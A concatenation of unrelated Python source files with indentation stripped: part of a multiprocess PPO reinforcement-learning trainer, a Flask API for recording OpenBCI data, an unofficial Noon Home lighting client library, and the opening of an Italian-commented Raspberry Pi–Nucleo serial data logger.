self.state_buffer, self.action_buffer = [], []
self.reward_buffer, self.cumulative_reward_buffer = [], []
def a_train(self, s, a, adv, oldpi):
'''
Update policy network
:param state: state batch
:param action: action batch
:param adv: advantage batch
:param old_pi: old pi distribution
:return:
'''
mu, std = self.actor(s)
pi = Normal(mu, std)
# ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
surr = ratio * adv
if METHOD['name'] == 'kl_pen':
lam = METHOD['lam']
kl = torch.distributions.kl.kl_divergence(oldpi, pi)
kl_mean = kl.mean()
aloss = -((surr - lam * kl).mean())
else: # clipping method, find this is better
aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
self.actor_optimizer.zero_grad()
aloss.backward()
self.actor_optimizer.step()
if METHOD['name'] == 'kl_pen':
return kl_mean
def c_train(self, cumulative_r, s):
'''
Update actor network
:param cumulative_r: cumulative reward
:param s: state
:return: None
'''
v = self.critic(s)
advantage = cumulative_r - v
closs = (advantage**2).mean()
self.critic_optimizer.zero_grad()
closs.backward()
self.critic_optimizer.step()
def update(self):
'''
Update parameter with the constraint of KL divergent
:return: None
'''
s = torch.Tensor(self.state_buffer).to(device)
a = torch.Tensor(self.action_buffer).to(device)
r = torch.Tensor(self.cumulative_reward_buffer).to(device)
with torch.no_grad():
mean, std = self.actor(s)
pi = torch.distributions.Normal(mean, std)
adv = r - self.critic(s)
# adv = (adv - adv.mean())/(adv.std()+1e-6) # sometimes helpful
# update actor
if METHOD['name'] == 'kl_pen':
for _ in range(A_UPDATE_STEPS):
kl = self.a_train(s, a, adv, pi)
if kl > 4 * METHOD['kl_target']: # this in in google's paper
break
if kl < METHOD['kl_target'] / 1.5: # adaptive lambda, this is in OpenAI's paper
METHOD['lam'] /= 2
elif kl > METHOD['kl_target'] * 1.5:
METHOD['lam'] *= 2
METHOD['lam'] = np.clip(
METHOD['lam'], 1e-4, 10
) # sometimes explode, this clipping is MorvanZhou's solution
else: # clipping method, find this is better (OpenAI's paper)
for _ in range(A_UPDATE_STEPS):
self.a_train(s, a, adv, pi)
# update critic
for _ in range(C_UPDATE_STEPS):
self.c_train(r, s)
self.state_buffer.clear()
self.action_buffer.clear()
self.cumulative_reward_buffer.clear()
self.reward_buffer.clear()
def choose_action(self, s, deterministic=False):
'''
Choose action
:param s: state
:return: clipped act
'''
a = self.actor.get_action(s, deterministic)
return a.detach().cpu().numpy()
def get_v(self, s):
'''
Compute value
:param s: state
:return: value
'''
s = s.astype(np.float32)
if s.ndim < 2: s = s[np.newaxis, :]
s = torch.FloatTensor(s).to(device)
return self.critic(s).squeeze(0).detach().cpu().numpy()
def save_model(self, path):
torch.save(self.actor.state_dict(), path+'_actor')
torch.save(self.critic.state_dict(), path+'_critic')
def load_model(self, path):
self.actor.load_state_dict(torch.load(path+'_actor'))
self.critic.load_state_dict(torch.load(path+'_critic'))
self.actor.eval()
self.critic.eval()
def store_transition(self, state, action, reward):
"""
Store state, action, reward at each step
:param state:
:param action:
:param reward:
:return: None
"""
self.state_buffer.append(state)
self.action_buffer.append(action)
self.reward_buffer.append(reward)
def finish_path(self, next_state, done):
"""
Calculate cumulative reward
:param next_state:
:return: None
"""
if done:
v_s_ = 0
else:
v_s_ = self.critic(torch.Tensor([next_state]).to(device)).cpu().detach().numpy()[0, 0]
discounted_r = []
for r in self.reward_buffer[::-1]:
v_s_ = r + GAMMA * v_s_ # no future reward if next state is terminal
discounted_r.append(v_s_)
discounted_r.reverse()
discounted_r = np.array(discounted_r)[:, np.newaxis]
self.cumulative_reward_buffer.extend(discounted_r)
self.reward_buffer.clear()
def ShareParameters(adamoptim):
''' share parameters of Adamoptimizers for multiprocessing '''
for group in adamoptim.param_groups:
for p in group['params']:
state = adamoptim.state[p]
# initialize: have to initialize here, or else cannot find
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
# share in memory
state['exp_avg'].share_memory_()
state['exp_avg_sq'].share_memory_()
def plot(rewards):
clear_output(True)
plt.figure(figsize=(10,5))
plt.plot(rewards)
plt.savefig('ppo_multi.png')
# plt.show()
plt.clf()
def worker(id, ppo, rewards_queue):
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
all_ep_r = []
for ep in range(EP_MAX):
s = env.reset()
ep_r = 0
t0 = time.time()
for t in range(EP_LEN): # in one episode
# env.render()
a = ppo.choose_action(s)
s_, r, done, _ = env.step(a)
ppo.store_transition(s, a, (r+8)/8) # useful for pendulum
s = s_
ep_r += r
# update ppo
if len(ppo.state_buffer) == BATCH:
ppo.finish_path(s_, done)
ppo.update()
if done:
break
ppo.finish_path(s_, done)
if ep == 0:
all_ep_r.append(ep_r)
else:
all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
if ep%50==0:
ppo.save_model(MODEL_PATH)
print(
'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
ep, EP_MAX, ep_r,
time.time() - t0
)
)
rewards_queue.put(ep_r)
ppo.save_model(MODEL_PATH)
env.close()
def main():
# reproducible
# env.seed(RANDOMSEED)
np.random.seed(RANDOMSEED)
torch.manual_seed(RANDOMSEED)
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
ppo = PPO(state_dim, action_dim, hidden_dim=128)
if args.train:
ppo.actor.share_memory()
ppo.critic.share_memory()
ShareParameters(ppo.actor_optimizer)
ShareParameters(ppo.critic_optimizer)
rewards_queue=mp.Queue() # used for get rewards from all processes and plot the curve
processes=[]
rewards=[]
for i in range(NUM_WORKERS):
process = Process(target=worker, args=(i, ppo, rewards_queue)) # the args contain shared and not shared
process.daemon=True # all processes closed when the main stops
processes.append(process)
[p.start() for p in processes]
while True: # keep geting the episode reward from the queue
r = rewards_queue.get()
if r is not None:
if len(rewards) == 0:
rewards.append(r)
else:
rewards.append(rewards[-1] * 0.9 + r * 0.1)
else:
break
if len(rewards)%20==0 and len(rewards)>0:
plot(rewards)
[p.join() for p in processes] # finished at the same time
ppo.save_model(MODEL_PATH)
if args.test:
ppo.load_model(MODEL_PATH)
while True:
s = env.reset()
for i in range(EP_LEN):
env.render()
s, r, done, _ = env.step(ppo.choose_action(s, True))
if done:
break
if __name__ == '__main__':
main()
|
api.py
|
from datetime import datetime
from functools import wraps
from flask import Blueprint, request, current_app
import os
import dcp.mp.shared as shared
from dcp import db
from collections import deque
import time
from dcp.models.data import CollectedData
from dcp.models.collection import BCICollection
bp = Blueprint('api', __name__, url_prefix='/api')
def validate_json(*fields):
"""Decorator to validate JSON body.
See https://flask.palletsprojects.com/en/2.0.x/patterns/viewdecorators/.
"""
def decorator(f):
@wraps(f)
def decorated(*args, **kwargs):
if not request.is_json or not request.json:
return {}, 400
missing_fields = fields - request.json.keys()
if len(missing_fields) > 0:
return {'error_message':
f'Missing fields: {", ".join(missing_fields)}'}, 400
return f(*args, **kwargs)
return decorated
return decorator
@bp.route("/openbci/start", methods=['POST'])
def openbci_start():
# TODO handle case where json is empty and return error
if request.json is None:
return {"error_message": "A json object with attributed 'collector_name' must be submitted"}, 400
try:
collector_name = request.json["collector_name"]
current_app.logger.info(f"Current collect name is: {collector_name}.")
except KeyError as e:
return {'error_message': f'{e}. The \"collector_name\" attribute is missing from the json.'}, 400
# use a separate process to stream BCI data
from dcp.bci.stream import stream_bci_api
from multiprocessing import Process
with current_app.app_context():
# Although the subprocess gets initialized inside this scope, it will persist
# bci_processes_states references this subprocess_dict
shared.initialize_queue()
subprocess_dict = shared.get_manager().dict({
'character': None,
'phase': None,
'frequency': None,
'collection_id': None,
'bci_config': None,
'state': None
})
# only pass this subprocess dict to ensure that locks are not too contentious
p = Process(target=stream_bci_api, args=(subprocess_dict,shared.queue))
# need to start process before referencing it to obtain the right process_id
p.start()
shared.get_bci_processes_states()[p.pid] = subprocess_dict
BCI_CONNECT_TIMEOUT = 10
start = time.time()
while subprocess_dict['state'] != 'ready' or subprocess_dict['bci_config'] == None:
current_app.logger.info("Trying to resolve BCI stream.")
time.sleep(1)
if (time.time() - start) > BCI_CONNECT_TIMEOUT:
current_app.logger.info("BCI connection timeout, failed to resolve BCI stream.")
p.kill()
return {"error_message": "Server timeout"}, 408
collection = BCICollection(bci_configuration=subprocess_dict['bci_config'],collector_name=collector_name)
db.session.add(collection)
db.session.commit()
subprocess_dict['collection_id'] = collection.id
# once the subprocess is ready, return from call
return {"data": {"pid": p.pid}}, 201
@bp.route('/openbci/<int:process_id>/collect/start', methods=['POST'])
def openbci_process_collect_start(process_id: int):
data = request.json
# We now know that the request contains all the keys
if process_id not in shared.get_bci_processes_states():
return {'error_message': f'There is no process with id {process_id}, make sure your process id is valid'}, 404
subprocess_dict = shared.get_bci_processes_states()[process_id]
try:
subprocess_dict['character'] = data['character']
subprocess_dict['frequency'] = float(data['frequency'])
subprocess_dict['phase'] = float(data['phase'])
except KeyError as e:
return {'error_message': f'Key {e} is missing from json.'}, 400
except ValueError as e:
return {'error_message': f'{e}. Make sure the data is the correct type: string for character, and float for phase and frequency.'}, 400
subprocess_dict['state'] = 'collect'
current_app.logger.info(
f"BCI is collecting data for character \"{subprocess_dict['character']}\" with phase {subprocess_dict['phase']} and frequency {subprocess_dict['frequency']}.")
return {'success_message': 'BCI is collecting.'}, 201
@bp.route('/openbci/<int:process_id>/collect/stop', methods=['POST'])
def openbci_process_collect_stop(process_id: int):
if process_id not in shared.get_bci_processes_states():
return {'error_message': 'There is no process with this id, make sure your process id is valid'}, 404
subprocess_dict = shared.get_bci_processes_states()[process_id]
subprocess_dict['state'] = 'ready'
current_app.logger.info(f"Stopped collecting for character {subprocess_dict['character']}.")
current_app.logger.info(f"Writing collected data for character {subprocess_dict['character']} to the database.")
# write to database
if not write_stream_data(subprocess_dict):
return {'error_message': "Did not write any data to the database, make sure to call /openbci/<int:process_id>/collect/start before this route."}, 400
# clear the subprocess_dict
subprocess_dict['character'] = None
subprocess_dict['frequency'] = None
subprocess_dict['phase'] = None
return {'success_message': 'BCI has stopped collecting, and the queue has been written to the database'}, 201
@bp.route("/openbci/<int:process_id>/stop", methods=['POST'])
def openbci_stop(process_id: int):
if process_id not in shared.get_bci_processes_states():
return {'error_message': 'There is no process with this id, make sure your process id is valid'}, 404
subprocess_dict = shared.get_bci_processes_states()[process_id]
if subprocess_dict['state'] == 'collect':
subprocess_dict['state'] = 'stop'
return {"error_message": f"Stopped bci process while it was collecting, data was not written for character {subprocess_dict['character']}."}, 400
subprocess_dict['state'] = 'stop'
if not shared.queue.empty():
return {'error_message': f"Stopped bci process, however the queue for BCI data was not empty, data for character {subprocess_dict['character']} might be incomplete."}, 400
collection = db.session.query(BCICollection).get(subprocess_dict['collection_id'])
collection.collection_end_time = datetime.utcnow()
db.session.commit()
shared.get_bci_processes_states().pop(process_id)
return {'success_message': f"Successfully ended BCI subprocess with id {process_id}"}, 200
def write_stream_data(subprocess_dict):
# ensure any remaining connections are flushed to avoid racing conditions
db.engine.dispose()
order = 1
collected_data = []
while not shared.queue.empty():
stream_data = shared.queue.get_nowait()
for row in stream_data:
collected_data.append(
CollectedData(
channel_1=float(row[0]),
channel_2=float(row[1]),
channel_3=float(row[2]),
channel_4=float(row[3]),
channel_5=float(row[4]),
channel_6=float(row[5]),
channel_7=float(row[6]),
channel_8=float(row[7]),
collection_id=subprocess_dict['collection_id'],
character=subprocess_dict['character'],
frequency=subprocess_dict['frequency'],
phase=subprocess_dict['phase'],
order=order
)
)
order += 1
db.session.add_all(collected_data)
db.session.commit()
if len(collected_data) > 0:
current_app.logger.info("Successfully wrote {} samples to the database.".format(len(collected_data)))
return True
return False
|
__init__.py
|
"""
Basic connectivity and control for Noon Home Room Director and Extension switches.
Note that this API is not supported by Noon, and is subject to change or withdrawal at any time.
"""
__author__ = "Alistair Galbraith"
__copyright__ = "Copyright 2018, Alistair Galbraith"
import logging
import requests
import websocket
import threading
import json
import datetime
from typing import Any, Callable, Dict, Type
from pynoon.const import (
LOGIN_URL, RENEW_TOKEN_URL, DEX_URL
)
_LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
NoonEventHandler = Callable[['NoonEntity', Any, 'NoonEvent', Dict], None]
class NoonException(Exception):
pass
class NoonAuthenticationError(NoonException):
pass
class NoonInvalidParametersError(NoonException):
pass
class NoonInvalidJsonError(NoonException):
pass
class NoonDuplicateIdError(NoonException):
pass
class NoonUnknownError(NoonException):
pass
class NoonEvent(object):
pass
class NoonEntity(object):
def __init__(self, noon, guid, name):
"""Initializes the base class with common, basic data."""
self._noon = noon
self._name = name
self._guid = guid
self._subscribers = []
noon._registerEntity(self)
@property
def name(self):
"""Returns the entity name (e.g. Pendant)."""
return self._name
@property
def guid(self):
"""Returns the entity unique ID (GUID from Noon)."""
return self._guid
def _dispatch_event(self, event: NoonEvent, params: Dict):
"""Dispatches the specified event to all the subscribers."""
_LOGGER.debug("Sending notifications!")
for handler, context in self._subscribers:
_LOGGER.debug("...notification sent.")
handler(self, context, event, params)
def subscribe(self, handler: NoonEventHandler, context):
"""Subscribes to events from this entity.
handler: A callable object that takes the following arguments (in order)
obj: the LutrongEntity object that generated the event
context: user-supplied (to subscribe()) context object
event: the LutronEvent that was generated.
params: a dict of event-specific parameters
context: User-supplied, opaque object that will be passed to handler.
"""
_LOGGER.debug("Added update subscriber for {}".format(self.name))
self._subscribers.append((handler, context))
def handle_update(self, args):
"""The handle_update callback is invoked when an event is received
for the this entity.
Returns:
True - If event was valid and was handled.
False - otherwise.
"""
return False
@classmethod
def fromJsonObject(cls, noon, json):
raise NoonInvalidJsonError
return False
class NoonSpace(NoonEntity):
class Event(NoonEvent):
"""Output events that can be generated.
SCENE_CHANGED: The scene has changed.
Params:
scene: new scene guid (string)
"""
SCENE_CHANGED = 1
"""
LIGHTSON_CHANGED: The space lights have turned or off.
Params:
lightsOn: Lights are on (boolean)
"""
LIGHTSON_CHANGED = 2
@property
def lightsOn(self):
return self._lightsOn
@lightsOn.setter
def lightsOn(self, value):
valueChanged = (self._lightsOn != value)
self._lightsOn = value
if valueChanged:
self._dispatch_event(NoonSpace.Event.LIGHTSON_CHANGED, {'lightsOn': self._lightsOn})
@property
def activeSceneName(self):
if self.activeScene is not None:
scene = self._scenes.get(self.activeScene, None)
if scene:
return scene.name
else:
return "Unknown"
else:
return "Unknown"
@property
def activeScene(self):
return self._activeScene
@activeScene.setter
def activeScene(self, value):
""" This may be a dict object - {"guid": "some-guid-value-here"} """
actualValue = value
if isinstance(actualValue, Dict) and actualValue.get("guid", None) is not None:
actualValue = actualValue.get("guid")
""" Sanity check - we should have a scene for this """
newScene = self._scenes.get(actualValue, None)
if newScene is None:
if actualValue is not None:
_LOGGER.error("Space changed to new scene '{}', but this scene is unknown!".format(actualValue))
return
""" Debug """
_LOGGER.info("Scene for space '{}' changed to '{}'".format(self.name, newScene.name))
valueChanged = (self._activeScene != actualValue)
self._activeScene = actualValue
if valueChanged:
self._dispatch_event(NoonSpace.Event.SCENE_CHANGED, {'sceneId': self._activeScene})
def setSceneActive(self, active=None, sceneIdOrName=None):
""" (Re)authenticate if needed """
self._noon.authenticate()
""" Replace variables """
if active is None:
active = self.lightsOn
if sceneIdOrName is None:
sceneIdOrName = self.activeScene
""" Get the scene """
targetScene = self._scenes.get(sceneIdOrName, None)
if targetScene is None:
for id, scene in self._scenes.items():
if scene.name == sceneIdOrName:
targetScene = scene
""" Sanity Check """
if targetScene is None:
_LOGGER.error("Did not find scene in space '{}' with name or ID {}".format(self.name, sceneIdOrName))
raise NoonInvalidParametersError
""" Send the command """
_LOGGER.debug("Attempting to activate scene {} in space '{}', with active = {}".format(targetScene.name, self.name, active))
actionUrl = "{}/api/action/space/scene".format(self._noon.endpoints["action"])
result = self._noon.session.post(actionUrl, headers={"Authorization": "Token {}".format(self._noon.authToken)}, json={"space": self.guid, "activeScene": targetScene.guid, "on": active, "tid": 55555})
_LOGGER.debug("Got activate scene result: {}".format(result))
def activateScene(self):
self.setSceneActive(active=True)
def deactivateScene(self):
self.setSceneActive(active=False)
def __init__(self, noon, guid, name, activeScene=None, lightsOn=None, lines={}, scenes={}):
"""Initializes the Space."""
self._activeScene = None
self._lightsOn = None
self._lines = lines
self._scenes = scenes
super(NoonSpace, self).__init__(noon, guid, name)
""" Trigger any initial updates """
self.activeScene = activeScene
self.lightsOn = lightsOn
def __str__(self):
"""Returns a pretty-printed string for this object."""
return 'Space name: "%s" active scene ID: %s, lights on: "%s"' % (
self._name, self._activeScene, self._lightsOn)
def __repr__(self):
"""Returns a stringified representation of this object."""
return str({'name': self._name, 'activeScene': self._activeScene,
'lightsOn': self._lightsOn, 'id': self._guid})
@classmethod
def fromJsonObject(cls, noon, json):
"""Sanity Check"""
if not isinstance(noon, Noon):
_LOGGER.error("Noon object not correctly passed as a parameter")
raise NoonInvalidParametersError
if not isinstance(json, Dict):
_LOGGER.error("JSON object must be pre-parsed before loading")
raise NoonInvalidParametersError
"""Basics"""
guid = json.get("guid", None)
name = json.get("name", None)
if guid is None or name is None:
_LOGGER.debug("Invalid JSON payload: {}".format(json))
raise NoonInvalidJsonError
newSpace = NoonSpace(noon, guid, name)
"""Scenes"""
scenesMap = {}
for scene in json.get("scenes", []):
thisScene = NoonScene.fromJsonObject(noon, newSpace, scene)
scenesMap[thisScene.guid] = thisScene
newSpace._scenes = scenesMap
"""Lines"""
linesMap = {}
for line in json.get("lines", []):
thisLine = NoonLine.fromJsonObject(noon, newSpace, line)
linesMap[thisLine.guid] = thisLine
newSpace._lines = linesMap
""" Status """
lightsOn = json.get("lightsOn", None)
activeScene = json.get("activeScene", {}).get("guid", None)
newSpace.lightsOn = lightsOn
newSpace.activeScene = activeScene
return newSpace
class NoonLine(NoonEntity):
class Event(NoonEvent):
"""Output events that can be generated.
DIM_LEVEL_CHANGED: The dim level of this line has changed.
Params:
dimLevel: New dim level percent (integer)
"""
DIM_LEVEL_CHANGED = 1
"""
LINE_STATE_CHANGED: The line lights have turned or off.
Params:
lineState: Line State (string - 'on' or 'off')
"""
LINE_STATE_CHANGED = 2
@property
def lineState(self):
return self._lineState
@lineState.setter
def lineState(self, value):
valueChanged = (self._lineState != value)
self._lineState = value
if valueChanged:
self._dispatch_event(NoonLine.Event.LINE_STATE_CHANGED, {'lineState': self._lineState})
@property
def parentSpace(self):
return self._parentSpace
@property
def dimmingLevel(self):
return self._dimmingLevel
@dimmingLevel.setter
def dimmingLevel(self, value):
valueChanged = (self._dimmingLevel != value)
self._dimmingLevel = value
if valueChanged:
self._dispatch_event(NoonLine.Event.DIM_LEVEL_CHANGED, {'dimLevel': self._dimmingLevel})
def set_brightness(self, brightnessLevel):
""" (Re)authenticate if needed """
self._noon.authenticate()
""" Send the command """
actionUrl = "{}/api/action/line/lightLevel".format(self._noon.endpoints["action"])
result = self._noon.session.post(actionUrl, headers={"Authorization": "Token {}".format(self._noon.authToken)}, json={"line": self.guid, "lightLevel": brightnessLevel, "tid": 55555})
_LOGGER.debug("Got set_brightness result: {}".format(result))
def turn_on(self):
self.set_brightness(100)
def turn_off(self):
self.set_brightness(0)
def __init__(self, noon, space, guid, name, dimmingLevel=None, lineState=None):
"""Initializes the Space."""
self._lineState = None
self._dimmingLevel = None
self._parentSpace = space
super(NoonLine, self).__init__(noon, guid, name)
""" Trigger any initial updates """
self.lineState = lineState
self.dimmingLevel = dimmingLevel
@classmethod
def fromJsonObject(cls, noon, space, json):
"""Sanity Check"""
if not isinstance(noon, Noon):
_LOGGER.error("Noon object not correctly passed as a parameter")
raise NoonInvalidParametersError
if not isinstance(json, Dict):
_LOGGER.error("JSON object must be pre-parsed before loading")
raise NoonInvalidParametersError
"""Basics"""
guid = json.get("guid", None)
name = json.get("displayName", None)
if guid is None or name is None:
_LOGGER.debug("Invalid JSON payload: {}".format(json))
raise NoonInvalidJsonError
newLine = NoonLine(noon, space, guid, name)
""" Status """
lineState = json.get("lineState", None)
dimmingLevel = json.get("dimmingLevel", None)
newLine.lineState = lineState
newLine.dimmingLevel = dimmingLevel
return newLine
def __str__(self):
"""Returns a pretty-printed string for this object."""
return 'Line name: "%s" lights on: %s, dim level: "%s"' % (
self._name, self._lineState, self._dimmingLevel)
def __repr__(self):
"""Returns a stringified representation of this object."""
return str({'name': self._name, 'dimmingLevel': self._dimmingLevel,
'lightsOn': self._lineState, 'id': self._guid})
class NoonScene(NoonEntity):
def __init__(self, noon, space, guid, name):
"""Initializes the Space."""
self._parentSpace = space
super(NoonScene, self).__init__(noon, guid, name)
@classmethod
def fromJsonObject(cls, noon, space, json):
"""Sanity Check"""
if not isinstance(noon, Noon):
_LOGGER.error("Noon object not correctly passed as a parameter")
raise NoonInvalidParametersError
if not isinstance(json, Dict):
_LOGGER.error("JSON object must be pre-parsed before loading")
raise NoonInvalidParametersError
"""Basics"""
guid = json.get("guid", None)
name = json.get("name", None)
if guid is None or name is None:
_LOGGER.debug("Invalid JSON payload: {}".format(json))
raise NoonInvalidJsonError
newScene = NoonScene(noon, space, guid, name)
return newScene
def __str__(self):
"""Returns a pretty-printed string for this object."""
return 'Scene name: "%s" id: "%s"' % (
self._name, self._guid)
def __repr__(self):
"""Returns a stringified representation of this object."""
return str({'name': self._name, 'id': self._guid})
class Noon(object):
""" Base object for Noon Home """
@property
def spaces(self):
return self.__spaces
@property
def lines(self):
return self.__lines
def __init__(self, username=None, password=None):
""" Create a PyNoon object
:param username: Noon username
:param password: Noon password
:returns PyNoon base object
"""
# Key internal flags
self.__authenticated = False
self.__loginResponse = None
self.__token = None
self.__tokenValidUntil = datetime.datetime.now()
self.__tokenRenewValidUntil = datetime.datetime.now()
self.__session = requests.Session()
self.__subscribed = False
# Store credentials
self.__username = username
self.__password = password
self.__endpoints = {}
# Flag for tracking errors
self.__errorCount = 0
self.__lastConnectAttempt = 0
# External Properties
self.__spaces = {}
self.__lines = {}
self.__scenes = {}
self.__allEntities = {}
@property
def endpoints(self):
return self.__endpoints
@property
def session(self):
return self.__session
@property
def authToken(self):
return self.__token
def authenticate(self):
""" Do we already have valid tokens? """
if self.__token is not None and self.__tokenValidUntil > datetime.datetime.now():
_LOGGER.debug("Using cached token, which should still be valid")
return
""" Authenticate user, and get tokens """
_LOGGER.debug("No valid token or token expired. Authenticating...")
if(self.__tokenRenewValidUntil > datetime.datetime.now()):
url = RENEW_TOKEN_URL
json = self.__loginResponse
else:
url = LOGIN_URL
json = {"email": self.__username, "password": self.__password}
result = self.__session.post(url, json=json).json()
if isinstance(result, dict) and result.get("token") is not None:
""" Debug """
_LOGGER.debug("Authenticated successfully with Noon")
""" Store the token and expiry time """
self.authenticated = True
self.__loginResponse = result
self.__token = result.get("token")
self.__tokenValidUntil = datetime.datetime.now() + datetime.timedelta(seconds = (result.get("lifetime",0)-30))
self.__tokenRenewValidUntil = datetime.datetime.now() + datetime.timedelta(seconds = (result.get("renewLifetime",0)-30))
_LOGGER.debug("Authenticated. Token expires at {:%H:%M:%S}.".format(self.__tokenValidUntil))
""" Get endpoints if needed """
if len(self.__endpoints) == 0:
self._refreshEndpoints
self._refreshEndpoints()
else:
_LOGGER.debug("Response: {}".format(result))
raise NoonAuthenticationError
def _refreshEndpoints(self):
""" Update the noon endpoints for this account """
_LOGGER.debug("Refreshing endpoints...")
result = self.__session.get(DEX_URL, headers={"Authorization": "Token {}".format(self.__token)}).json()
if isinstance(result, dict) and isinstance(result.get("endpoints"), dict):
self.__endpoints = result.get("endpoints")
else:
_LOGGER.debug("Response: {}".format(result))
raise NoonAuthenticationError
def _registerEntity(self, entity: NoonEntity):
""" EVERYTHING """
self.__allEntities[entity.guid] = entity
""" SPACE """
if isinstance(entity, NoonSpace):
existingEntity = self.__spaces.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self.__spaces[entity.guid] = entity
""" LINE """
if isinstance(entity, NoonLine):
existingEntity = self.__lines.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self.__lines[entity.guid] = entity
""" SCENE """
if isinstance(entity, NoonScene):
existingEntity = self.__scenes.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self.__scenes[entity.guid] = entity
def discoverDevices(self):
""" (Re)authenticate if needed """
self.authenticate()
""" Get the device details for this account """
_LOGGER.debug("Refreshing devices...")
queryUrl = "{}/api/query".format(self.__endpoints["query"])
result = self.__session.post(queryUrl, headers={"Authorization": "Token {}".format(self.__token), "Content-Type":"application/graphql"}, data="{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}").json()
if isinstance(result, dict) and isinstance(result.get("spaces"), list):
for space in result.get("spaces"):
# Create the space
thisSpace = NoonSpace.fromJsonObject(self, space)
# Debug
_LOGGER.debug("Discovered space '{}'".format(thisSpace.name))
else:
_LOGGER.error("Invalid device discovery response from Noon")
_LOGGER.warn("Response: {}".format(result))
def connect(self):
""" (Re)authenticate if needed """
self.authenticate()
""" Connect on a separate thread """
if not self.__subscribed:
self.__subscribed = True
self.__event_handle = threading.Event()
event_thread = threading.Thread(target=self._thread_event_function)
event_thread.start()
else:
_LOGGER.error("Already attached to event stream!")
def _thread_event_function(self):
self.__subscribed = True
self.__lastConnectAttempt = datetime.datetime.now()
websocket.enableTrace(False)
eventStreamUrl = "{}/api/notifications".format(self.__endpoints["notification-ws"])
self.__websocket = websocket.WebSocketApp(eventStreamUrl,
header = {
"Authorization": "Token {}".format(self.__token)
},
on_message = _on_websocket_message,
on_error = _on_websocket_error,
on_close = _on_websocket_close)
self.__websocket.on_open = _on_websocket_open
self.__websocket.parent = self
self.__websocket.run_forever(ping_interval=30)
return True
def _handle_change(self, changeSummary):
guid = changeSummary.get("guid", None)
if guid is None:
_LOGGER.error("Cannot process change - no GUID in {}".format(changeSummary))
return
affectedEntity = self.__allEntities.get(guid, None)
if affectedEntity is None:
_LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, changeSummary))
return
_LOGGER.debug("Got change notification for '{}' - {}".format(affectedEntity.name, changeSummary))
changedFields = changeSummary.get("fields", [])
writeableFields = [attr for attr, value in vars(affectedEntity.__class__).items()
if isinstance(value, property) and value.fset is not None]
_LOGGER.debug("Settable fields for this entity - {}".format(writeableFields))
for changedField in changedFields:
key = changedField.get("name")
value = changedField.get("value")
if key in writeableFields:
_LOGGER.debug("...setting {} = {}".format(key, value))
setattr(affectedEntity, key, value)
else:
_LOGGER.debug("...ignoring {} = {}".format(key, value))
def _websocket_connected(self):
_LOGGER.debug("Successful connection. Resetting error timers.")
self.__errorCount = 0
def _websocket_disconnected(self):
""" Flag disconnected """
self.__subscribed = False
""" Look at our failure time. If it's within the last 30 seconds, we'll abort rather than spam Noon's servers """
if self.__lastConnectAttempt < (datetime.datetime.now() - datetime.timedelta(seconds = 30)):
_LOGGER.error("Failed to open websocket connection on first attempt. Giving up.")
raise NoonException
else:
self.connect()
def _websocket_message(self, message):
""" Ignore empty messages """
if message is None or len(message) < 5:
return
""" Attempt to parse the message """
try:
jsonMessage = json.loads(message)
except:
_LOGGER.debug("Failed to parse message: {}".format(message))
return
""" What sort of message is this? """
if isinstance(jsonMessage, Dict):
""" State change notification """
if jsonMessage.get("event", None) == "notification" and isinstance(jsonMessage.get("data"), Dict):
data = jsonMessage.get("data")
changes = data.get("changes", [])
for change in changes:
self._handle_change(change)
else:
_LOGGER.error("Unexpected notifiction - {}".format(jsonMessage))
else:
_LOGGER.error("Invalid notifiction - {}".format(jsonMessage))
def _on_websocket_message(ws, message):
ws.parent._websocket_message(message)
def _on_websocket_error(ws, error):
_LOGGER.error("Websocket: Error - {}".format(error))
def _on_websocket_close(ws):
_LOGGER.error("Websocket: Closed")
ws.parent._websocket_disconnected()
def _on_websocket_open(ws):
_LOGGER.debug("Websocket: Opened")
ws.parent._websocket_connected()
|
raspiNucleo.py
|
import serial.tools.list_ports, serial
import datetime, sys, types, os, time, threading, shelve
import dialog
"""interfaccia di comunicazione Raspberry NucleoSTM
Questo modulo permette la coomunicazione tra STMnucleo e Raspberry tramite porta usb
per comandare un'interfaccia sensori e raccogliere dati in file csv
il codice si divide in sue parti: prima la nucleo entra in modalità init
e continua inviare una stringa con il nome delle variabili. usare lo user button per
avviare questa sessione. attendere la conferma di ricevuto dati dal rasp
rasp deve poi dare un parse delle variabili e chidere tramite terminale quali memorizzare
nella seconda fase, la nucleo manda i dati via usb e rasp li appende al file csv fio al
termine dell'esperimento.
todo, inviare info si sensori per avere i dati con la precisione strumenti
"""
class menu_item:
def __init__(self, name, info):
self.name = name
self.info = info
# todo fare una classe strumento
# GLOBAL VARIABLES
sampling_Hz = 1000 # period_us microseconds nucleo timer
mem_index = []
available_instruments = []
instruments_db = []
file_name, last_description, last_folder = "", '', ''
"""STRUTTURA MENU INIZIALE """
# sampling rate menu
sampling_rate = menu_item(name='sampling rate',
info="frequenza di campionamento in Hz")
# seleziona strumenti menu
seleziona_strumenti = menu_item(name='seleziona strumenti',
info="spostare a destra gli strumenti da utilizzare. viene mostrata la configurazione attuale")
# imposta strumenti menu
